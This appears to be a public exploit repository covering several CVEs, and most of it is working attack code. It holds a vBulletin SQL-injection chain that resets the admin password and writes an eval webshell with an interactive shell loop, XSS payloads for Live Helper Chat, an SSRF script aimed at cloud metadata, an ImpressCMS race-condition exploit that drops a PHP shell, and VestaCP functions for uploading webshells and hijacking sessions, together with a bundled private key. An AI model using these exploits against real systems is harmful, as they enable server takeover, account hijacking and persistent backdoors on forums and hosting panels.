├── CVE-2020-12720
    ├── README.md
    └── exploit.py
├── CVE-2020-26134
    └── README.md
├── CVE-2020-36474
    ├── poc.py
    └── readme.md
├── CVE-2022-24977
    ├── poc.py
    └── readme.md
├── README.md
└── VestaCP
    ├── README.md
    ├── VestaFuncs.py
    ├── cert.pem
    ├── key.pem
    ├── requirements.txt
    ├── vestaATO.py
    ├── vestaEMAIL.py
    ├── vestaROOT.py
    ├── vestaXSS.py
    └── videos
        ├── vestaATO.mp4
        ├── vestaEMAIL.mp4
        ├── vestaROOT.mp4
        └── vestaXSS.mp4


/CVE-2020-12720/README.md:
--------------------------------------------------------------------------------
 1 | vulnerability discovered by cfreal, this is just an exploit code discovered out of patch diff
 2 | 
 3 | this is made to work with the default vbulletin captcha
 4 | 
 5 | ```
 6 | $ python3 exploit.py http://localhost/vb/
 7 | [+] Host is up and vulnerable
 8 | [+] Table prefix tableprefix_
 9 | [+] admin original token $2y$15$lP7uTPrHIE6JTGnWI3rTCOGp9YEMUX72NrJSAEXGgIFxy/.RqMl.a
10 | [+] Captcha ZY3E2a
11 | [+] Resetting password
12 | [!] new admin credentials {admin:P4$$w0rd!}
13 | [+] Writing shell
14 | [!] GOT SHELL
15 | > id
16 | uid=33(www-data) gid=33(www-data) groups=33(www-data)
17 | > whoami
18 | www-data
19 | > ls
20 | LICENSE
21 | config.php
22 | config.php.bkp
23 | core
24 | favicon.ico
25 | fonts
26 | htaccess.txt
27 | images
28 | includes
29 | index.php
30 | js
31 | web.config
32 | > 
33 | ```
34 | 


--------------------------------------------------------------------------------
/CVE-2020-12720/exploit.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | # rekter0, zenofex
  3 | 
  4 | import requests
  5 | import sys
  6 | from random import randint
  7 | 
  8 | if (len(sys.argv)<2 ):
  9 | 	print('[*] usage: ./'+sys.argv[0]+' http://host/forum')
 10 | 	exit()
 11 | 
 12 | url = sys.argv[1]
 13 | 
 14 | #CHECK
 15 | s = requests.Session()
 16 | r = s.post(url+'/ajax/api/content_infraction/getIndexableContent', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,"vbulletinrcepoc",8,7,6,5,4,3,2,1;-- -'})
 17 | 
 18 | if not 'vbulletinrcepoc' in r.text:
 19 | 	print('[-] not vulnerable')
 20 | 	exit()
 21 | 
 22 | print('[+] Host is up and vulnerable')
 23 | 
 24 | # GET TABLES PREFIXES
 25 | r = s.post(url+'/ajax/api/content_infraction/getIndexableContent', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,table_name,8,7,6,5,4,3,2,1 from information_schema.columns WHERE column_name=\'phrasegroup_cppermission\';-- -'})
 26 | table_prefix=r.json()['rawtext'].split('language')[0]
 27 | 
 28 | print('[+] Table prefix '+table_prefix)
 29 | 
 30 | # GET ADMIN DETAILS
 31 | # assuming admin groupid=6, default install groups unchanged
 32 | r = s.post(url+'/ajax/api/content_infraction/getIndexableContent', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,concat(username,0x7c,userid,0x7c,email,0x7c,token),8,7,6,5,4,3,2,1 from '+table_prefix+'user where usergroupid=6;-- -'})
 33 | admin_user,admin_id,admin_email,admin_orig_token = r.json()['rawtext'].split('|')
 34 | print('[+] admin original token '+admin_orig_token)
 35 | 
 36 | 
 37 | # REQUEST CAPTCHA
 38 | r = s.post(url+'/ajax/api/hv/generateToken?',headers={'X-Requested-With': 'XMLHttpRequest'},data={'securitytoken':'guest'})
 39 | rhash=r.json()['hash']
 40 | r = s.get(url+'/hv/image?hash='+rhash)
 41 | 
 42 | 
 43 | 
 44 | # GET CAPTCHA
 45 | r = s.post(url+'/ajax/api/content_infraction/getIndexableContent', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,count(answer),8,7,6,5,4,3,2,1 from '+table_prefix+'humanverify limit 0,1-- -'})
 46 | 
 47 | #print r.text
 48 | r = s.post(url+'/ajax/api/content_infraction/getIndexableContent', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,(answer),8,7,6,5,4,3,2,1 from '+table_prefix+'humanverify limit '+str(int(r.json()['rawtext'])-1)+',1-- -'})
 49 | 
 50 | 
 51 | # REQUEST NEW PW
 52 | CAPTCHA=r.json()['rawtext']
 53 | 
 54 | 
 55 | print('[+] Captcha '+CAPTCHA)
 56 | 
 57 | r = s.post(url+'/auth/lostpw', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'email':admin_email,'humanverify[input]':CAPTCHA,'humanverify[hash]':rhash,'securitytoken':'guest'})
 58 | if not r.json()['response']==None:
 59 | 	print('[-] reset pw failed')
 60 | 	exit()
 61 | 
 62 | print('[+] Resetting password')
 63 | # RETRIEVE RESET TOKEN FROM DB
 64 | # GET CAPTCHA
 65 | r = s.post(url+'/ajax/api/content_infraction/getIndexableContent', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,activationid,8,7,6,5,4,3,2,1 from '+table_prefix+'useractivation WHERE userid='+admin_id+' limit 0,1-- -'})
 66 | TOKEN=r.json()['rawtext']
 67 | 
 68 | 
 69 | # RESET PW
 70 | r = s.post(url+'/auth/reset-password', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'userid':admin_id,'activationid':TOKEN,'new-password':'P4$$w0rd!','new-password-confirm':'P4$$w0rd!','securitytoken':'guest'})
 71 | if not 'Logging in' in r.text:
 72 | 	print('[-] fail')
 73 | 	exit()
 74 | print('[!] new admin credentials {'+admin_user+':P4$$w0rd!}')
 75 | 
 76 | 
 77 | # LOGIN
 78 | r = s.post(url+'/auth/ajax-login', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'username':admin_user,'password':'P4$$w0rd!','securitytoken':'guest'})
 79 | TOKEN = r.json()['newtoken']
 80 | 
 81 | print('[+] Writing shell')
 82 | #ACTIVATE SITE-BUILDER
 83 | r = s.post(url+'/ajax/activate-sitebuilder', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'pageid':'1','nodeid':'0','userid':'1','loadMenu':'false','isAjaxTemplateRender':'true','isAjaxTemplateRenderWithData':'true','securitytoken':TOKEN})
 84 | 
 85 | r = s.post(url+'/auth/ajax-login', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'logintype':'cplogin','userid':admin_id,'password':'P4$$w0rd!','securitytoken':TOKEN})
 86 | 
 87 | # SAVE WIDGET
 88 | r = s.post(url+'/ajax/api/widget/saveNewWidgetInstance', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'containerinstanceid':'0','widgetid':'23','pagetemplateid':'','securitytoken':TOKEN})
 89 | widgetinstanceid = r.json()['widgetinstanceid']
 90 | pagetemplateid   = r.json()['pagetemplateid']
 91 | 
 92 | r = s.post(url+'/ajax/api/widget/saveAdminConfig', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'widgetid':'23','pagetemplateid':pagetemplateid,'widgetinstanceid':widgetinstanceid,'data[widget_type]':'','data[title]':'Unconfigured+PHP+Module','data[show_at_breakpoints][desktop]':'1','data[show_at_breakpoints][small]':'1','data[show_at_breakpoints][xsmall]':'1','data[hide_title]':'0','data[module_viewpermissions][key]':'show_all','data[code]':'eval($_GET["e"]);','securitytoken':TOKEN})
 93 | 
 94 | 
 95 | #SAVE PAGE
 96 | myshell = 'myshell'+str(randint(10, 100))
 97 | r = s.post(url+'/admin/savepage', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'input[ishomeroute]':'0','input[pageid]':'0','input[nodeid]':'0','input[userid]':admin_id,'input[screenlayoutid]':'2','input[templatetitle]':myshell,'input[displaysections[0]]':'[]','input[displaysections[1]]':'[]','input[displaysections[2]]':'[{"widgetId":"23","widgetInstanceId":"'+str(widgetinstanceid)+'"}]','input[displaysections[3]]':'[]','input[pagetitle]':myshell,'input[resturl]':myshell,'input[metadescription]':'vBulletin Forums','input[pagetemplateid]':pagetemplateid,'url':url,'securitytoken':TOKEN})
 98 | 
 99 | 
100 | r = s.get(url+'/'+myshell+'?e=echo \'pwwwwwwwwwwwwwwwwwwned!\';', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} )
101 | if 'pwwwwwwwwwwwwwwwwwwned' in r.text:
102 | 	print('[!] GOT SHELL')
103 | 	while True:
104 | 		cmd = input('> ')
105 | 		r = s.get(url+'/'+myshell+'?e=system(\''+cmd+'\');', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} )
106 | 		print(r.text.split('<div class="widget-content">')[1].split('</div>')[0].strip().rstrip())
107 | 
108 | 


--------------------------------------------------------------------------------
/CVE-2020-26134/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | # CVE-2020-26134 
 3 | 
 4 | ## description
 5 | Live Helper Chat before 3.44v allows stored XSS in chat messages with an operator via BBCode.
 6 | 
 7 | > ------------------------------------------
 8 | >
 9 | > [Vulnerability Type]
10 | > Cross Site Scripting (XSS)
11 | >
12 | > ------------------------------------------
13 | >
14 | > [Vendor of Product]
15 | > LiveHelperChat
16 | >
17 | > ------------------------------------------
18 | >
19 | > [Affected Product Code Base]
20 | > https://github.com/LiveHelperChat/livehelperchat - versions < 3.44
21 | >
22 | > ------------------------------------------
23 | >
24 | > [Affected Component]
25 | > stored xss in chat messages with operator
26 | >
27 | > ------------------------------------------
28 | 
29 | 
30 | ## vulnerability
31 | livehelperchat allows bbcode usage, but the parser fails to sanitize the message when combined with url, (url parser fail) to insert them into webpage correctly.
32 | different bbcodes can be abused
33 | ```
34 |   '/\[list\=(.*?)\](.*?)\[\/list\]/ms',
35 |   '/\[fs(.*?)\](.*?)\[\/fs(.*?)\]/ms',
36 |   '/\[color\=(.*?)\](.*?)\[\/color\]/ms'
37 | ```
38 | 
39 | example payload
40 | 
41 | ```[list="><img src="http://onmouseover=alert(document.domain)//"><ol f="][/list]```
42 | 
43 | 
44 | # CVE-2020-26135
45 | 
46 | > [Vulnerability Type]
47 | > Cross Site Scripting (XSS)
48 | >
49 | > ------------------------------------------
50 | >
51 | > [Vendor of Product]
52 | > LiveHelperChat
53 | >
54 | > ------------------------------------------
55 | >
56 | > [Affected Product Code Base]
57 | > https://github.com/LiveHelperChat/livehelperchat - versions < 3.44
58 | >
59 | > ------------------------------------------
60 | >
61 | > [Affected Component]
62 | > reflected xss in setsettingajax
63 | >
64 | > ------------------------------------------
65 | 
66 | example payload
67 | ```
68 | http://HOST/LCH_PATH/index.php/user/setsettingajax/%3Csvg%20onload=alert(1)%3E
69 | ```
70 | 
71 | 
72 | 


--------------------------------------------------------------------------------
/CVE-2020-36474/poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | import requests
 3 | import re
 4 | import json
 5 | import sys
 6 | 
 7 | if(len(sys.argv) != 5):
 8 |         print("usage: ./"+sys.argv[0]+" <vanilahost> <forumuser> <forumpw> <metadata_path> <dns_rebind_host>")
 9 |         print("usage: ./"+sys.argv[0]+" http://target_host/vanilla_path simpleuser simpleuser22 latest/meta-data/ rebinder.host")
10 |         exit()
11 | 
12 | s = requests.Session()
13 | 
14 | hst = sys.argv[1]
15 | usr = sys.argv[2]
16 | pwd = sys.argv[3]
17 | metadata_path = sys.argv[4]
18 | rbdrhst = sys.argv[5]
19 | 
20 | headers = {
21 | 	'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
22 | 	'X-Requested-With': 'XMLHttpRequest',
23 |         'Referer': hst+'/vanilla/index.php?p=/entry/signin'
24 | }
25 | 
26 | r = s.get(hst+"/index.php?p=/entry/signin")
27 | tkey=re.findall(r'<input type="hidden" id="Form_TransientKey" name="TransientKey" value="(.*?)" \/>',r.text)[0]
28 | 
29 | login_data={
30 | 	"TransientKey": tkey,
31 |         "Email": usr,
32 |         "Password": pwd,
33 |         "DeliveryType": "VIEW",
34 |         "RememberMe": "1",
35 |         "DeliveryMethod": "JSON",
36 |         "Target": "discussions",
37 | }
38 | r =s.post(hst+'/index.php?p=/entry/signin', data=login_data, headers=headers)
39 | 
40 | if('Please wait while you are redirected. If you are not redirected, click' in r.text):
41 |         msg=None
42 |         while(msg==None):
43 |                 r =s.post(hst+'/api/v2/media/scrape', data={'url':'http://'+rbdrhst+'/'+metadata_path}, headers=headers)
44 |                 ret=json.loads(r.text)
45 |                 try:
46 |                         msg=ret["body"]
47 |                 except Exception as e:
48 |                         #print(ret)
49 |                         msg=None
50 | else:
51 |         print('login failed')
52 | 
53 | print(msg)
54 | 


--------------------------------------------------------------------------------
/CVE-2020-36474/readme.md:
--------------------------------------------------------------------------------
1 | ### Vulnerability analysis
2 | https://r0.haxors.org/posts?id=13


--------------------------------------------------------------------------------
/CVE-2022-24977/poc.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | import string
 3 | import requests
 4 | from multiprocessing.dummy import Pool as ThreadPool
 5 | if len(sys.argv)<3:
 6 |     print('python '+sys.argv[0]+' http://localhost 1')
 7 |     print('python '+sys.argv[0]+' http://localhost 2')
 8 |     exit()
 9 | HOST = sys.argv[1]
10 | PATH = '/editors/CKeditor/ceditfinder/imageeditor/processImage.php'
11 | sess_name = 'letspwnimpressCMS'
12 | headers = {
13 |     'Connection': 'close', 
14 |     'Cookie': 'PHPSESSID=' + sess_name
15 | }
16 | payload = '<?=eval($_GET[a]);exit;//'
17 | def runner1(i):
18 |     data = {
19 |         'PHP_SESSION_UPLOAD_PROGRESS': 'A' + payload + 'A'
20 |     }
21 |     while 1:
22 |         fp = open('/etc/hosts', 'rb')
23 |         r = requests.post(HOST+PATH, files={'f': fp}, data=data, headers=headers)
24 |         fp.close()
25 | def runner2(i):
26 |     filename = '/var/lib/php/sessions/sess_' + sess_name
27 |     while 1:
28 |         url = HOST+PATH+'?origName=.....///.....///.....///.....///uploads/aa.php&imageName=/var/lib/php/sessions/sess_letspwnimpressCMS&action=save'
29 |         r = requests.get(url, headers=headers)
30 |         c = r.content
31 |         url2 = requests.get(HOST+'/uploads/aa.php?a=echo%20%2799999999999999999999999999999%27;copy(%27aa.php%27,%27bb.php%27);')
32 |         if('99999999999999999999999999999' in url2.text):
33 |             print('[+] done!')
34 |             print('[!] Check '+HOST+'/uploads/bb.php?a=phpinfo();')
35 |             exit()
36 | 
37 | if sys.argv[2] == '1':
38 |     runner = runner1
39 | else:
40 |     runner = runner2
41 | 
42 | pool = ThreadPool(32)
43 | result = pool.map_async( runner, range(32) ).get(0xffff)


--------------------------------------------------------------------------------
/CVE-2022-24977/readme.md:
--------------------------------------------------------------------------------
 1 | ### Vulnerability analysis
 2 | https://r0.haxors.org/posts?id=8
 3 | 
 4 | 
 5 | -- terminal 1
 6 | ```
 7 | $ python3 a.py http://localhost/ 1
 8 | ```
 9 | 
10 | -- terminal 2
11 | ```
12 | $ python3 a.py http://localhost/ 2
13 | [+] done!
14 | [!] Check http://localhost//uploads/bb.php?a=phpinfo();
15 | 
16 | $ curl "http://localhost//uploads/bb.php?a=phpinfo();"
17 | upload_progress_A<br />
18 | <b>Warning</b>:  Use of undefined constant a - assumed 'a' (this will throw an Error in a future version of PHP) in <b>/var/www/html/uploads/bb.php</b> on line <b>1</b><br />
19 | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
20 | <html xmlns="http://www.w3.org/1999/xhtml"><head>
21 | <style type="text/css">
22 | [...]
23 | [...]
24 | [...]
25 | ```
26 | 
27 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # exploits
2 | 


--------------------------------------------------------------------------------
/VestaCP/README.md:
--------------------------------------------------------------------------------
1 | [technical details](https://ssd-disclosure.com/ssd-advisory-vestacp-multiple-vulnerabilities/)


--------------------------------------------------------------------------------
/VestaCP/VestaFuncs.py:
--------------------------------------------------------------------------------
  1 | import requests
  2 | import re
  3 | import json
  4 | import socket
  5 | from urllib.parse import urlparse
  6 | import random
  7 | import string
  8 | import base64
  9 | 
 10 | from urllib3.exceptions import InsecureRequestWarning
 11 | requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
 12 | 
 13 | def resetPassword(username,targetHost,rkey):
 14 | 	newPassword = get_random_string()
 15 | 	r = requests.post(targetHost + '/api/v1/reset/index.php', verify=False, data={'password':newPassword,'password_confirm':newPassword, 'user':username,'code':rkey})
 16 | 	if '"error":null,' in r.text:
 17 | 		return newPassword
 18 | 	else:
 19 | 		return False
 20 | 
 21 | def checkSessions(us,targetHost,ipFromHostname,sessions,pwnDomain):
 22 | 	for i in sessions:
 23 | 		qTry = queryWebshell('echo `curl -k "https://127.0.0.1:'+str(urlparse(targetHost).port)+'/api/v1/login/session.php" -H "Cookie: PHPSESSID='+i+';" `;',ipFromHostname,pwnDomain)
 24 | 		if '"root_dir":"\\/home\\/admin"' in qTry:
 25 | 			print('[++] Admin session found ')
 26 | 			return i,qTry
 27 | 	print('[!] no admin session found')
 28 | 	return False
 29 | 
 30 | 
 31 | def getSessIDs(us,targetHost,SessID):
 32 | 	r = us.get(targetHost + '/api/v1/upload/index.php?dir=/usr/local/vesta/data/sessions', verify=False)
 33 | 	try:
 34 | 		if '{"files":' in r.text:
 35 | 			myList = []
 36 | 			for i in r.json()['files']:
 37 | 				if SessID not in i['name']:
 38 | 					myList.append(i['name'].replace('sess_',''))
 39 | 			return myList
 40 | 		else:
 41 | 			print('Getting Sessions list Error')
 42 | 			return False
 43 | 	except Exception as e:
 44 | 		print(str(e))
 45 | 		return False
 46 | 
 47 | 
 48 | def getIPfromHostname(hostn):
 49 | 	return socket.gethostbyname(urlparse(hostn).hostname)
 50 | 
 51 | def get_random_string(length=10):
 52 |     letters = string.ascii_letters+string.digits
 53 |     result_str = ''.join(random.choice(letters) for i in range(length))
 54 |     return result_str
 55 | 
 56 | def getSession(us,targetHost,ss=1):
 57 | 	sessPath ='/api/v1/login/index.php'
 58 | 	if ss == 2:
 59 | 		sessPath = '/api/v1/login/session.php'
 60 | 	r = us.get(targetHost + sessPath, verify=False)
 61 | 	try:
 62 | 		if '"token":"' in r.text:
 63 | 			return r.json()
 64 | 		else:
 65 | 			print('Getting own session data error')			
 66 | 			exit()
 67 | 	except Exception as e:
 68 | 		print(str(e))
 69 | 		exit()
 70 | 
 71 | def login(us,targetHost,login,passwd):
 72 | 	try:
 73 | 		r = us.post(targetHost + '/api/v1/login/index.php', verify=False, data={'user':login,'password':passwd,'token':getSession(us,targetHost)['token']})
 74 | 		if r.text and '"error":"Invalid username or password."' not in r.text:
 75 | 			print('[+] Logged in as '+login)
 76 | 			return True
 77 | 		else:
 78 | 			print("[!] login failed")
 79 | 			exit()
 80 | 			return False
 81 | 	except Exception as e:
 82 | 		print(str(e))
 83 | 		return False
 84 | 	
 85 | 
 86 | def logout(us,targetHost):
 87 | 	r = us.get(targetHost + '/api/v1/logout/index.php', verify=False)
 88 | 	print('[+] Logged out ')
 89 | 
 90 | def getWebshell(us,targetHost,shellHost,username,ipFromHostname):
 91 | 	#r = us.get(targetHost + '/api/v1/delete/web/index.php?domain='+shellHost+'&token='+getSession(us,targetHost,2)['token'],verify=False)
 92 | 	r = us.get(targetHost + '/api/v1/list/web/index.php', verify=False)
 93 | 	if shellHost not in r.text:
 94 | 		print('[!] '+shellHost+' not found, creating one...')
 95 | 		r = us.get(targetHost + '/api/v1/add/web/index.php', verify=False)
 96 | 		try:
 97 | 			webConf = r.json()
 98 | 			## Checking if IPs match			
 99 | 			if ipFromHostname not in r.text:
100 | 				print('[!] IP mismatch, select an appropriate IP for the '+shellHost)
101 | 				confIPsList = []
102 | 				count = 0
103 | 				for i in webConf['ips']:
104 | 					confIPsList.append(i)
105 | 					print('\t['+str(count)+'] '+i)
106 | 					count+=1
107 | 				selectedIP = confIPsList[int(input('\t> '))]
108 | 			else:
109 | 				selectedIP = ipFromHostname
110 | 			
111 | 			r2 = us.post(targetHost + '/api/v1/add/web/index.php' , verify=False, data={"ok": "add", "token": getSession(us,targetHost,2)['token'], "v_domain": shellHost, "v_ip": selectedIP, "v_aliases": "www."+shellHost, "v_dns": "on", "v_mail": "on", "v_proxy": "on", "v_proxy_ext": webConf['proxy_ext']})
112 | 			if 'has been created successfully' in r2.text:
113 | 				print('[+] '+shellHost+' added')
114 | 		except Exception as e:
115 | 			print(str(e))
116 | 			return False
117 | 		
118 | 	
119 | 	print('[+] '+shellHost+' found, looking up webshell')
120 | 	checkWS = queryWebshell('echo HelloVestaPWN3647387238263784;',ipFromHostname,shellHost)
121 | 	if('HelloVestaPWN3647387238263784' not in checkWS):
122 | 		print('[!] webshell not found, creating one..')
123 | 		r = us.post(targetHost+'/api/v1/upload/?dir=/home/'+username+'/web/'+shellHost+'/public_html',verify=False,files = {'files': ('ownwebshell.php', '<?php\nif(@$_GET["password"]!="e43c9f07ed59712efa492aa0ae259cd0") exit();\neval($_GET["e"]);')} )
124 | 		if('"name":"ownwebshell.php"' in r.text):
125 | 			print('[+] Webshell uploaded')
126 | 			return True
127 | 		else:
128 | 			print('[!] webshell upload error')
129 | 			return False
130 | 	else:
131 | 		print('[+] '+username+' webshell found')
132 | 		return True
133 | 		
134 | 
135 | def createMailBox(us,targetHost,shellHost,isDebug):
136 | 	mailAccount  = get_random_string().lower()
137 | 	mailPassword = get_random_string()
138 | 	r = us.get(targetHost + '/api/v1/delete/mail/index.php?domain='+shellHost+'&token='+getSession(us,targetHost,2)['token'],verify=False)
139 | 	r = us.get(targetHost + '/api/v1/list/mail/index.php', verify=False)
140 | 	if shellHost in r.text:
141 | 		if isDebug: print('[+] Mail domain found')
142 | 	else:
143 | 		if isDebug: print('[!] Mail domain not found, creating one..')
144 | 		r2 = us.post(targetHost + '/api/v1/add/mail/index.php', verify=False, data={"ok": "add", "token": getSession(us,targetHost,2)['token'], "v_domain": shellHost, "v_antispam": "on", "v_antivirus": "on", "v_dkim": "on"})
145 | 		if '"error_msg":null' in r2.text:
146 | 			if isDebug: print('[+] Mail domain created')
147 | 		else:
148 | 			print('[!] mail domain creating error')
149 | 			return False
150 | 
151 | 	r = us.post(targetHost + '/api/v1/add/mail/index.php?domain='+shellHost,verify=False, data={"v_domain": shellHost, "v_account": mailAccount, "v_password": mailPassword, "Username": "@"+shellHost, "v_credentials": '', "ok_acc": "add", "token": getSession(us,targetHost,2)['token'], "Password": mailPassword})
152 | 	if '"error_msg":null' in r.text:
153 | 		if isDebug: print('[+] Mail account created')
154 | 		return {'account':mailAccount,'password':mailPassword}
155 | 	else:
156 | 		print('[!] creating new mail failed ..')
157 | 		return False
158 | 
159 | 
160 | def editMailBox(us,targetHost,shellHost,Vaccount,payload,isDebug=True):
161 | 	r = us.post(targetHost + '/api/v1/edit/mail/index.php?domain='+shellHost+'&account='+Vaccount,verify=False, data={"save": "save", "token": getSession(us,targetHost,2)['token'], "v_domain": shellHost, "v_password": '', "v_quota": "unlimited", "v_aliases": '', "v_fwd": payload, "v_credentials": '', "Username": "@"+shellHost, "v_account": Vaccount, "Password": ''})
162 | 	if '"ok_msg":"Changes have been saved."' in r.text:
163 | 		return True
164 | 	else:
165 | 		if isDebug: print('[!] mailbox edit failed ..')
166 | 		return False
167 | 
168 | def b64en(strr):
169 | 	return base64.b64encode(strr.encode('utf-8')).decode('utf-8')
170 | 
171 | def deploycommand(cmd,ipFromHostname,pwnDomain):
172 | 	queryWebshell('echo `pwd;mkdir -p ./iamroot;`;',ipFromHostname,pwnDomain)
173 | 	queryWebshell('`printf '+b64en(cmd)+'|base64 -d > ./iamroot/cmdtoexec`;',ipFromHostname,pwnDomain)
174 | 
175 | def queryWebshell(cmd,ipFromHostname,shellHost='vestapwn.poc'):
176 | 	r = requests.get('http://'+ipFromHostname+'/ownwebshell.php?password=e43c9f07ed59712efa492aa0ae259cd0&e='+cmd,headers={'Host':shellHost},verify=False)
177 | 	return r.text
178 | 
179 | 


--------------------------------------------------------------------------------
/VestaCP/cert.pem:
--------------------------------------------------------------------------------
 1 | -----BEGIN CERTIFICATE-----
 2 | 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
31 | -----END CERTIFICATE-----
32 | 


--------------------------------------------------------------------------------
/VestaCP/key.pem:
--------------------------------------------------------------------------------
 1 | -----BEGIN PRIVATE KEY-----
 2 | MIIJQwIBADANBgkqhkiG9w0BAQEFAASCCS0wggkpAgEAAoICAQCtPdgeV4QRqn/v
 3 | L1hrxMaeYNqo1tIA8fpxdiOUzfES6QaRcm6OK86Z5Z3bxD5yseNx34HWiBarZk3Z
 4 | zArTTF2vV+nZLRG/Fg/0238TClVn3FVeHxd+RH0h6JGL5OWqRAPLUMBlFfjWGZX6
 5 | jS3DQBnRwujp2erDNmnrKii4HXg/0wEVb5bmUqcyDmka7RYzhafaJdlCjfo1yTm4
 6 | Lwb50/Gne4V0bs0MwTQew7D657r7J8w4VBOc9LnEsOq55rrMJ1G6J9zKD9JalSdw
 7 | vnSWPRHo68B0Ednp52Qu7nkvL3AiPvz3iybPGLf/bLrEylj3TnSvVjpI6N7mwriv
 8 | ZplIYKuSy5T9Pm4Q58fIZ8Es+nBVLjdNhdMtopqelYd3V7MCl2Ry03Sq8JcUSE/H
 9 | 5vCUuZSm3N4DpEX/A/TrKLCAqdvYM/xbCOG9bpecChlOpJ1NwgYOpoQ8+dIDpYmc
10 | B12W04+vUpdq/rK9ZMk5aJCOik5iXIycj7ZxXh7qv3yh8BtBEDh+zxAPxvd5P1HI
